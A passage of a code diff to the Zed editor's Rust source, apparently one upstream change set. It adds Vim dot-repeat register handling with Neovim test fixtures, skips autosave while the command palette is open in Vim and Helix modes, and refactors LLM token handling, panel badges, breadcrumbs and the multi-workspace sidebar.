@@ -1586,6 +1592,7 @@ impl Vim {
globals.dot_recording = true;
globals.recording_actions = Default::default();
globals.recording_count = None;
+ globals.recording_register_for_dot = self.selected_register;
let selections = self.editor().map(|editor| {
editor.update(cx, |editor, cx| {
@@ -2070,7 +2077,7 @@ impl Vim {
input_enabled: self.editor_input_enabled(),
expects_character_input: self.expects_character_input(),
autoindent: self.should_autoindent(),
- cursor_offset_on_selection: self.mode.is_visual(),
+ cursor_offset_on_selection: self.mode.is_visual() || self.mode.is_helix(),
line_mode: matches!(self.mode, Mode::VisualLine),
hide_edit_predictions: !matches!(self.mode, Mode::Insert | Mode::Replace),
}
@@ -2092,6 +2099,11 @@ impl Vim {
editor.selections.set_line_mode(state.line_mode);
editor.set_edit_predictions_hidden_for_vim_mode(state.hide_edit_predictions, window, cx);
}
+
+ fn set_status_label(&mut self, label: impl Into<SharedString>, cx: &mut Context<Editor>) {
+ self.status_label = Some(label.into());
+ cx.notify();
+ }
}
struct VimEditorSettingsState {
@@ -1561,6 +1561,38 @@ mod test {
});
}
+ #[gpui::test]
+ async fn test_visual_block_insert_after_ctrl_d_scroll(cx: &mut gpui::TestAppContext) {
+ let mut cx = NeovimBackedTestContext::new(cx).await;
+ let shared_state_lines = (1..=10)
+ .map(|line_number| format!("{line_number:02}"))
+ .collect::<Vec<_>>()
+ .join("\n");
+ let shared_state = format!("ˇ{shared_state_lines}\n");
+
+ cx.set_scroll_height(5).await;
+ cx.set_shared_state(&shared_state).await;
+
+ cx.simulate_shared_keystrokes("ctrl-v ctrl-d").await;
+ cx.shared_state().await.assert_matches();
+
+ cx.simulate_shared_keystrokes("shift-i x escape").await;
+ cx.shared_state().await.assert_eq(indoc! {
+ "
+ ˇx01
+ x02
+ x03
+ x04
+ x05
+ 06
+ 07
+ 08
+ 09
+ 10
+ "
+ });
+ }
+
#[gpui::test]
async fn test_visual_block_wrapping_selection(cx: &mut gpui::TestAppContext) {
let mut cx = NeovimBackedTestContext::new(cx).await;
@@ -0,0 +1,125 @@
+{"Put":{"state":"ˇhello\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"p"}
+{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}}
+{"Key":"."}
+{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}}
+{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"_"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"p"}
+{"Get":{"state":"tocopytext\n3\nˇtocopytext\n","mode":"Normal"}}
+{"Put":{"state":"ˇtocopytext\n1\n2\n3\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"tocopytext\n1\n2\n3\nˇ1\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"ˇthree\n","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"p"}
+{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇline one\nline two\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"line one\nline two\nline one\nline one\nˇline one\n","mode":"Normal"}}
+{"Put":{"state":"ˇ1\n2\n3\n4\n5\n6\n7\n8\n9\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"ˇ","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"\n9\n8\n7\n6\n5\n4\n3\n2\n1\nˇ1","mode":"Normal"}}
+{"Put":{"state":"ˇa\nb\nc\n"}}
+{"Key":"\""}
+{"Key":"9"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"\""}
+{"Key":"9"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"a\na\na\nˇa\nb\nc\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\n9\none\nˇone\ntwo\nthree\n","mode":"Normal"}}
@@ -0,0 +1,105 @@
+{"Put":{"state":"ˇhello\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"p"}
+{"Get":{"state":"hello\nˇhello\n","mode":"Normal"}}
+{"Key":"."}
+{"Get":{"state":"hello\nhello\nˇhello\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\nfour\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"_"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"p"}
+{"Get":{"state":"one\nfour\nˇone\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\n"}}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\ntwo\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"."}
+{"Get":{"state":"ˇthree\n","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"\""}
+{"Key":"b"}
+{"Key":"p"}
+{"Get":{"state":"three\nˇtwo\n","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\nfour\nfive\nsix\nseven\neight\nnine\nten\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"ˇ","mode":"Normal"}}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Key":"."}
+{"Get":{"state":"\nten\nnine\neight\nseven\nsix\nfive\nfour\nthree\ntwo\nˇtwo","mode":"Normal"}}
+{"Put":{"state":"ˇone\ntwo\nthree\n"}}
+{"Key":"d"}
+{"Key":"d"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"two\none\nˇone\nthree\n","mode":"Normal"}}
+{"Put":{"state":"one\ntwo\nˇthree\n"}}
+{"Key":"\""}
+{"Key":"2"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"j"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"y"}
+{"Key":"y"}
+{"Key":"k"}
+{"Key":"\""}
+{"Key":"1"}
+{"Key":"p"}
+{"Key":"."}
+{"Key":"\""}
+{"Key":"a"}
+{"Key":"p"}
+{"Key":"."}
+{"Get":{"state":"one\ntwo\nthree\none\nˇone\ntwo\nthree\n","mode":"Normal"}}
@@ -0,0 +1,10 @@
+{"SetOption":{"value":"scrolloff=3"}}
+{"SetOption":{"value":"lines=7"}}
+{"Put":{"state":"ˇ01\n02\n03\n04\n05\n06\n07\n08\n09\n10\n"}}
+{"Key":"ctrl-v"}
+{"Key":"ctrl-d"}
+{"Get":{"state":"«0ˇ»1\n«0ˇ»2\n«0ˇ»3\n«0ˇ»4\n«0ˇ»5\n06\n07\n08\n09\n10\n","mode":"VisualBlock"}}
+{"Key":"shift-i"}
+{"Key":"x"}
+{"Key":"escape"}
+{"Get":{"state":"ˇx01\nx02\nx03\nx04\nx05\n06\n07\n08\n09\n10\n","mode":"Normal"}}
@@ -12,4 +12,5 @@ workspace = true
path = "src/vim_mode_setting.rs"
[dependencies]
+gpui.workspace = true
settings.workspace = true
@@ -4,6 +4,7 @@
//! disable Vim/Helix modes without having to depend on the `vim` crate in its
//! entirety.
+use gpui::App;
use settings::{RegisterSetting, Settings, SettingsContent};
#[derive(RegisterSetting)]
@@ -15,9 +16,25 @@ impl Settings for VimModeSetting {
}
}
+impl VimModeSetting {
+ pub fn is_enabled(cx: &App) -> bool {
+ Self::try_get(cx)
+ .map(|vim_mode| vim_mode.0)
+ .unwrap_or(false)
+ }
+}
+
#[derive(RegisterSetting)]
pub struct HelixModeSetting(pub bool);
+impl HelixModeSetting {
+ pub fn is_enabled(cx: &App) -> bool {
+ Self::try_get(cx)
+ .map(|helix_mode| helix_mode.0)
+ .unwrap_or(false)
+ }
+}
+
impl Settings for HelixModeSetting {
fn from_settings(content: &SettingsContent) -> Self {
Self(content.helix_mode.unwrap())
@@ -5,9 +5,9 @@ use client::{Client, UserStore};
use cloud_api_types::OrganizationId;
use cloud_llm_client::{WebSearchBody, WebSearchResponse};
use futures::AsyncReadExt as _;
-use gpui::{App, AppContext, Context, Entity, Subscription, Task};
+use gpui::{App, AppContext, Context, Entity, Task};
use http_client::{HttpClient, Method};
-use language_model::{LlmApiToken, NeedsLlmTokenRefresh, RefreshLlmTokenListener};
+use language_model::{LlmApiToken, NeedsLlmTokenRefresh};
use web_search::{WebSearchProvider, WebSearchProviderId};
pub struct CloudWebSearchProvider {
@@ -26,34 +26,16 @@ pub struct State {
client: Arc<Client>,
user_store: Entity<UserStore>,
llm_api_token: LlmApiToken,
- _llm_token_subscription: Subscription,
}
impl State {
pub fn new(client: Arc<Client>, user_store: Entity<UserStore>, cx: &mut Context<Self>) -> Self {
- let refresh_llm_token_listener = RefreshLlmTokenListener::global(cx);
+ let llm_api_token = LlmApiToken::global(cx);
Self {
client,
user_store,
- llm_api_token: LlmApiToken::default(),
- _llm_token_subscription: cx.subscribe(
- &refresh_llm_token_listener,
- |this, _, _event, cx| {
- let client = this.client.clone();
- let llm_api_token = this.llm_api_token.clone();
- let organization_id = this
- .user_store
- .read(cx)
- .current_organization()
- .map(|o| o.id.clone());
- cx.spawn(async move |_this, _cx| {
- llm_api_token.refresh(&client, organization_id).await?;
- anyhow::Ok(())
- })
- .detach_and_log_err(cx);
- },
- ),
+ llm_api_token,
}
}
}
@@ -73,7 +55,7 @@ impl WebSearchProvider for CloudWebSearchProvider {
.user_store
.read(cx)
.current_organization()
- .map(|o| o.id.clone());
+ .map(|organization| organization.id.clone());
let body = WebSearchBody { query };
cx.background_spawn(async move {
perform_web_search(client, llm_api_token, organization_id, body).await
@@ -61,12 +61,8 @@ pub fn init(cx: &mut App) {
pub static FILTERED_KEYSTROKES: LazyLock<Vec<Vec<Keystroke>>> = LazyLock::new(|| {
[
// Modifiers on normal vim commands
- "g h",
"g j",
"g k",
- "g l",
- "g $",
- "g ^",
// Duplicate keys with "ctrl" held, e.g. "ctrl-w ctrl-a" is duplicate of "ctrl-w a"
"ctrl-w ctrl-a",
"ctrl-w ctrl-c",
@@ -65,6 +65,7 @@ theme.workspace = true
ui.workspace = true
util.workspace = true
uuid.workspace = true
+vim_mode_setting.workspace = true
zed_actions.workspace = true
[target.'cfg(target_os = "windows")'.dependencies]
@@ -12,8 +12,10 @@ use gpui::{
};
use settings::SettingsStore;
use std::sync::Arc;
-use ui::{ContextMenu, Divider, DividerColor, IconButton, Tooltip, h_flex};
-use ui::{prelude::*, right_click_menu};
+use ui::{
+ ContextMenu, CountBadge, Divider, DividerColor, IconButton, Tooltip, prelude::*,
+ right_click_menu,
+};
use util::ResultExt as _;
pub(crate) const RESIZE_HANDLE_SIZE: Pixels = px(6.);
@@ -909,7 +911,7 @@ impl Render for PanelButtons {
DockPosition::Bottom | DockPosition::Right => (Corner::BottomRight, Corner::TopRight),
};
- let buttons: Vec<_> = dock
+ let mut buttons: Vec<_> = dock
.panel_entries
.iter()
.enumerate()
@@ -940,6 +942,7 @@ impl Render for PanelButtons {
};
let focus_handle = dock.focus_handle(cx);
+ let icon_label = entry.panel.icon_label(window, cx);
Some(
right_click_menu(name)
@@ -973,7 +976,7 @@ impl Render for PanelButtons {
.trigger(move |is_active, _window, _cx| {
// Include active state in element ID to invalidate the cached
// tooltip when panel state changes (e.g., via keyboard shortcut)
- IconButton::new((name, is_active_button as u64), icon)
+ let button = IconButton::new((name, is_active_button as u64), icon)
.icon_size(IconSize::Small)
.toggle_state(is_active_button)
.on_click({
@@ -987,18 +990,32 @@ impl Render for PanelButtons {
this.tooltip(move |_window, cx| {
Tooltip::for_action(tooltip.clone(), &*action, cx)
})
- })
+ });
+
+ div().relative().child(button).when_some(
+ icon_label
+ .clone()
+ .filter(|_| !is_active_button)
+ .and_then(|label| label.parse::<usize>().ok()),
+ |this, count| this.child(CountBadge::new(count)),
+ )
}),
)
})
.collect();
+ if dock_position == DockPosition::Right {
+ buttons.reverse();
+ }
+
let has_buttons = !buttons.is_empty();
h_flex()
.gap_1()
.when(
- has_buttons && dock.position == DockPosition::Bottom,
+ has_buttons
+ && (dock.position == DockPosition::Bottom
+ || dock.position == DockPosition::Right),
|this| this.child(Divider::vertical().color(DividerColor::Border)),
)
.children(buttons)
@@ -7,7 +7,8 @@ use ui::{App, Context};
use util::{ResultExt, paths::PathExt};
use crate::{
- NewWindow, SerializedWorkspaceLocation, WORKSPACE_DB, WorkspaceId, path_list::PathList,
+ NewWindow, SerializedWorkspaceLocation, WorkspaceId, path_list::PathList,
+ persistence::WorkspaceDb,
};
pub fn init(fs: Arc<dyn Fs>, cx: &mut App) {
@@ -40,8 +41,9 @@ impl HistoryManager {
}
fn init(this: Entity<HistoryManager>, fs: Arc<dyn Fs>, cx: &App) {
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |cx| {
- let recent_folders = WORKSPACE_DB
+ let recent_folders = db
.recent_workspaces_on_disk(fs.as_ref())
.await
.unwrap_or_default()
@@ -102,6 +104,7 @@ impl HistoryManager {
.map(|entry| entry.path.clone())
.collect::<Vec<_>>();
let user_removed = cx.update_jump_list(menus, entries);
+ let db = WorkspaceDb::global(cx);
cx.spawn(async move |this, cx| {
let user_removed = user_removed.await;
if user_removed.is_empty() {
@@ -119,7 +122,7 @@ impl HistoryManager {
}
}) {
for id in deleted_ids.iter() {
- WORKSPACE_DB.delete_workspace_by_id(*id).await.log_err();
+ db.delete_workspace_by_id(*id).await.log_err();
}
}
})
@@ -12,10 +12,11 @@ use client::{Client, proto};
use futures::{StreamExt, channel::mpsc};
use gpui::{
Action, AnyElement, AnyEntity, AnyView, App, AppContext, Context, Entity, EntityId,
- EventEmitter, FocusHandle, Focusable, Font, HighlightStyle, Pixels, Point, Render,
- SharedString, Task, WeakEntity, Window,
+ EventEmitter, FocusHandle, Focusable, Font, Pixels, Point, Render, SharedString, Task,
+ WeakEntity, Window,
};
use language::Capability;
+pub use language::HighlightedText;
use project::{Project, ProjectEntryId, ProjectPath};
pub use settings::{
ActivateOnClose, ClosePosition, RegisterSetting, Settings, SettingsLocation, ShowCloseButton,
@@ -25,7 +26,6 @@ use smallvec::SmallVec;
use std::{
any::{Any, TypeId},
cell::RefCell,
- ops::Range,
path::Path,
rc::Rc,
sync::Arc,
@@ -124,14 +124,6 @@ pub enum ItemEvent {
Edit,
}
-// TODO: Combine this with existing HighlightedText struct?
-#[derive(Debug)]
-pub struct BreadcrumbText {
- pub text: String,
- pub highlights: Option<Vec<(Range<usize>, HighlightStyle)>>,
- pub font: Option<Font>,
-}
-
#[derive(Clone, Copy, Default, Debug)]
pub struct TabContentParams {
pub detail: Option<usize>,
@@ -329,7 +321,7 @@ pub trait Item: Focusable + EventEmitter<Self::Event> + Render + Sized {
ToolbarItemLocation::Hidden
}
- fn breadcrumbs(&self, _cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, _cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
None
}
@@ -548,7 +540,7 @@ pub trait ItemHandle: 'static + Send {
) -> gpui::Subscription;
fn to_searchable_item_handle(&self, cx: &App) -> Option<Box<dyn SearchableItemHandle>>;
fn breadcrumb_location(&self, cx: &App) -> ToolbarItemLocation;
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>>;
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)>;
fn breadcrumb_prefix(&self, window: &mut Window, cx: &mut App) -> Option<gpui::AnyElement>;
fn show_toolbar(&self, cx: &App) -> bool;
fn pixel_position_of_cursor(&self, cx: &App) -> Option<Point<Pixels>>;
@@ -954,15 +946,29 @@ impl<T: Item> ItemHandle for Entity<T> {
// Only trigger autosave if focus has truly left the item.
// If focus is still within the item's hierarchy (e.g., moved to a context menu),
// don't trigger autosave to avoid unwanted formatting and cursor jumps.
- // Also skip autosave if focus moved to a modal (e.g., command palette),
- // since the user is still interacting with the workspace.
let focus_handle = item.item_focus_handle(cx);
- if !focus_handle.contains_focused(window, cx)
- && !workspace.has_active_modal(window, cx)
- {
- Pane::autosave_item(&item, workspace.project.clone(), window, cx)
- .detach_and_log_err(cx);
+ if focus_handle.contains_focused(window, cx) {
+ return;
}
+
+ let vim_mode = vim_mode_setting::VimModeSetting::is_enabled(cx);
+ let helix_mode = vim_mode_setting::HelixModeSetting::is_enabled(cx);
+
+ if vim_mode || helix_mode {
+ // We use the command palette for executing commands in Vim and Helix modes (e.g., `:w`), so
+ // in those cases we don't want to trigger auto-save if the focus has just been transferred
+ // to the command palette.
+ //
+ // This isn't totally perfect, as you could still switch files indirectly via the command
+ // palette (such as by opening up the tab switcher from it and then switching tabs that
+ // way).
+ if workspace.is_active_modal_command_palette(cx) {
+ return;
+ }
+ }
+
+ Pane::autosave_item(&item, workspace.project.clone(), window, cx)
+ .detach_and_log_err(cx);
}
},
)
@@ -1090,7 +1096,7 @@ impl<T: Item> ItemHandle for Entity<T> {
self.read(cx).breadcrumb_location(cx)
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.read(cx).breadcrumbs(cx)
}
@@ -26,6 +26,15 @@ pub trait ModalView: ManagedView {
fn render_bare(&self) -> bool {
false
}
+
+ /// Returns whether this [`ModalView`] is the command palette.
+ ///
+ /// This breaks the encapsulation of the [`ModalView`] trait a little bit, but there doesn't seem to be an
+ /// immediate, more elegant way to have the workspace know about the command palette (due to dependency arrow
+ /// directions).
+ fn is_command_palette(&self) -> bool {
+ false
+ }
}
trait ModalViewHandle {
@@ -33,6 +42,7 @@ trait ModalViewHandle {
fn view(&self) -> AnyView;
fn fade_out_background(&self, cx: &mut App) -> bool;
fn render_bare(&self, cx: &mut App) -> bool;
+ fn is_command_palette(&self, cx: &App) -> bool;
}
impl<V: ModalView> ModalViewHandle for Entity<V> {
@@ -51,6 +61,10 @@ impl<V: ModalView> ModalViewHandle for Entity<V> {
fn render_bare(&self, cx: &mut App) -> bool {
self.read(cx).render_bare()
}
+
+ fn is_command_palette(&self, cx: &App) -> bool {
+ self.read(cx).is_command_palette()
+ }
}
pub struct ActiveModal {
@@ -189,6 +203,13 @@ impl ModalLayer {
pub fn has_active_modal(&self) -> bool {
self.active_modal.is_some()
}
+
+ /// Returns whether the active modal is the command palette.
+ pub fn is_active_modal_command_palette(&self, cx: &App) -> bool {
+ self.active_modal
+ .as_ref()
+ .map_or(false, |modal| modal.modal.is_command_palette(cx))
+ }
}
impl Render for ModalLayer {
@@ -5,33 +5,37 @@ use gpui::{
ManagedView, MouseButton, Pixels, Render, Subscription, Task, Tiling, Window, WindowId,
actions, deferred, px,
};
-use project::{DisableAiSettings, Project};
+use project::DisableAiSettings;
+#[cfg(any(test, feature = "test-support"))]
+use project::Project;
use settings::Settings;
use std::future::Future;
use std::path::PathBuf;
+use std::sync::Arc;
use ui::prelude::*;
use util::ResultExt;
+use zed_actions::agents_sidebar::MoveWorkspaceToNewWindow;
const SIDEBAR_RESIZE_HANDLE_SIZE: Pixels = px(6.0);
use crate::{
- CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel, Toast,
- Workspace, WorkspaceId, client_side_decorations, notifications::NotificationId,
+ CloseIntent, CloseWindow, DockPosition, Event as WorkspaceEvent, Item, ModalView, Panel,
+ Workspace, WorkspaceId, client_side_decorations,
};
actions!(
multi_workspace,
[
- /// Creates a new workspace within the current window.
- NewWorkspaceInWindow,
- /// Switches to the next workspace within the current window.
- NextWorkspaceInWindow,
- /// Switches to the previous workspace within the current window.
- PreviousWorkspaceInWindow,
/// Toggles the workspace switcher sidebar.
ToggleWorkspaceSidebar,
+ /// Closes the workspace sidebar.
+ CloseWorkspaceSidebar,
/// Moves focus to or from the workspace sidebar without closing it.
FocusWorkspaceSidebar,
+ /// Switches to the next workspace.
+ NextWorkspace,
+ /// Switches to the previous workspace.
+ PreviousWorkspace,
]
);
@@ -41,17 +45,16 @@ pub enum MultiWorkspaceEvent {
WorkspaceRemoved(EntityId),
}
-pub enum SidebarEvent {
- Open,
- Close,
-}
-
-pub trait Sidebar: EventEmitter<SidebarEvent> + Focusable + Render + Sized {
+pub trait Sidebar: Focusable + Render + Sized {
fn width(&self, cx: &App) -> Pixels;
fn set_width(&mut self, width: Option<Pixels>, cx: &mut Context<Self>);
fn has_notifications(&self, cx: &App) -> bool;
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App);
- fn is_recent_projects_popover_deployed(&self) -> bool;
+
+ fn is_threads_list_view_active(&self) -> bool {
+ true
+ }
+ /// Makes focus reset bac to the search editor upon toggling the sidebar from outside
+ fn prepare_for_focus(&mut self, _window: &mut Window, _cx: &mut Context<Self>) {}
}
pub trait SidebarHandle: 'static + Send + Sync {
@@ -59,11 +62,12 @@ pub trait SidebarHandle: 'static + Send + Sync {
fn set_width(&self, width: Option<Pixels>, cx: &mut App);
fn focus_handle(&self, cx: &App) -> FocusHandle;
fn focus(&self, window: &mut Window, cx: &mut App);
+ fn prepare_for_focus(&self, window: &mut Window, cx: &mut App);
fn has_notifications(&self, cx: &App) -> bool;
fn to_any(&self) -> AnyView;
fn entity_id(&self) -> EntityId;
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App);
- fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool;
+
+ fn is_threads_list_view_active(&self, cx: &App) -> bool;
}
#[derive(Clone)]
@@ -93,6 +97,10 @@ impl<T: Sidebar> SidebarHandle for Entity<T> {
window.focus(&handle, cx);
}
+ fn prepare_for_focus(&self, window: &mut Window, cx: &mut App) {
+ self.update(cx, |this, cx| this.prepare_for_focus(window, cx));
+ }
+
fn has_notifications(&self, cx: &App) -> bool {
self.read(cx).has_notifications(cx)
}
@@ -105,14 +113,8 @@ impl<T: Sidebar> SidebarHandle for Entity<T> {
Entity::entity_id(self)
}
- fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App) {
- self.update(cx, |this, cx| {
- this.toggle_recent_projects_popover(window, cx);
- });
- }
-
- fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool {
- self.read(cx).is_recent_projects_popover_deployed()
+ fn is_threads_list_view_active(&self, cx: &App) -> bool {
+ self.read(cx).is_threads_list_view_active()
}
}
@@ -122,10 +124,8 @@ pub struct MultiWorkspace {
active_workspace_index: usize,
sidebar: Option<Box<dyn SidebarHandle>>,
sidebar_open: bool,
- _sidebar_subscription: Option<Subscription>,
pending_removal_tasks: Vec<Task<()>>,
_serialize_task: Option<Task<()>>,
- _create_task: Option<Task<()>>,
_subscriptions: Vec<Subscription>,
}
@@ -137,9 +137,6 @@ impl MultiWorkspace {
if let Some(task) = this._serialize_task.take() {
task.detach();
}
- if let Some(task) = this._create_task.take() {
- task.detach();
- }
for task in std::mem::take(&mut this.pending_removal_tasks) {
task.detach();
}
@@ -158,10 +155,8 @@ impl MultiWorkspace {
active_workspace_index: 0,
sidebar: None,
sidebar_open: false,
- _sidebar_subscription: None,
pending_removal_tasks: Vec::new(),
_serialize_task: None,
- _create_task: None,
_subscriptions: vec![
release_subscription,
quit_subscription,
@@ -170,21 +165,24 @@ impl MultiWorkspace {
}
}
- pub fn register_sidebar<T: Sidebar>(
- &mut self,
- sidebar: Entity<T>,
- window: &mut Window,
- cx: &mut Context<Self>,
- ) {
- let subscription =
- cx.subscribe_in(&sidebar, window, |this, _, event, window, cx| match event {
- SidebarEvent::Open => this.toggle_sidebar(window, cx),
- SidebarEvent::Close => {
- this.close_sidebar(window, cx);
+ pub fn register_sidebar<T: Sidebar>(&mut self, sidebar: Entity<T>, cx: &mut Context<Self>) {
+ self._subscriptions
+ .push(cx.observe(&sidebar, |this, _, cx| {
+ let has_notifications = this.sidebar_has_notifications(cx);
+ let is_open = this.sidebar_open;
+ let show_toggle = this.multi_workspace_enabled(cx);
+ for workspace in &this.workspaces {
+ workspace.update(cx, |workspace, cx| {
+ workspace.set_workspace_sidebar_open(
+ is_open,
+ has_notifications,
+ show_toggle,
+ cx,
+ );
+ });
}
- });
+ }));
self.sidebar = Some(Box::new(sidebar));
- self._sidebar_subscription = Some(subscription);
}
pub fn sidebar(&self) -> Option<&dyn SidebarHandle> {
@@ -192,7 +190,7 @@ impl MultiWorkspace {
}
pub fn sidebar_open(&self) -> bool {
- self.sidebar_open && self.sidebar.is_some()
+ self.sidebar_open
}
pub fn sidebar_has_notifications(&self, cx: &App) -> bool {
@@ -201,16 +199,10 @@ impl MultiWorkspace {
.map_or(false, |s| s.has_notifications(cx))
}
- pub fn toggle_recent_projects_popover(&self, window: &mut Window, cx: &mut App) {
- if let Some(sidebar) = &self.sidebar {
- sidebar.toggle_recent_projects_popover(window, cx);
- }
- }
-
- pub fn is_recent_projects_popover_deployed(&self, cx: &App) -> bool {
+ pub fn is_threads_list_view_active(&self, cx: &App) -> bool {
self.sidebar
.as_ref()
- .map_or(false, |s| s.is_recent_projects_popover_deployed(cx))
+ .map_or(false, |s| s.is_threads_list_view_active(cx))
}
pub fn multi_workspace_enabled(&self, cx: &App) -> bool {
@@ -227,11 +219,22 @@ impl MultiWorkspace {
} else {
self.open_sidebar(cx);
if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
}
}
+ pub fn close_sidebar_action(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ if !self.multi_workspace_enabled(cx) {
+ return;
+ }
+
+ if self.sidebar_open {
+ self.close_sidebar(window, cx);
+ }
+ }
+
pub fn focus_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
if !self.multi_workspace_enabled(cx) {
return;
@@ -248,11 +251,13 @@ impl MultiWorkspace {
let pane_focus = pane.read(cx).focus_handle(cx);
window.focus(&pane_focus, cx);
} else if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
} else {
self.open_sidebar(cx);
if let Some(sidebar) = &self.sidebar {
+ sidebar.prepare_for_focus(window, cx);
sidebar.focus(window, cx);
}
}
@@ -260,20 +265,27 @@ impl MultiWorkspace {
pub fn open_sidebar(&mut self, cx: &mut Context<Self>) {
self.sidebar_open = true;
+ let sidebar_focus_handle = self.sidebar.as_ref().map(|s| s.focus_handle(cx));
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
for workspace in &self.workspaces {
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(true, cx);
+ workspace.set_workspace_sidebar_open(true, has_notifications, show_toggle, cx);
+ workspace.set_sidebar_focus_handle(sidebar_focus_handle.clone());
});
}
self.serialize(cx);
cx.notify();
}
- fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
+ pub fn close_sidebar(&mut self, window: &mut Window, cx: &mut Context<Self>) {
self.sidebar_open = false;
+ let has_notifications = self.sidebar_has_notifications(cx);
+ let show_toggle = self.multi_workspace_enabled(cx);
for workspace in &self.workspaces {
workspace.update(cx, |workspace, cx| {
- workspace.set_workspace_sidebar_open(false, cx);
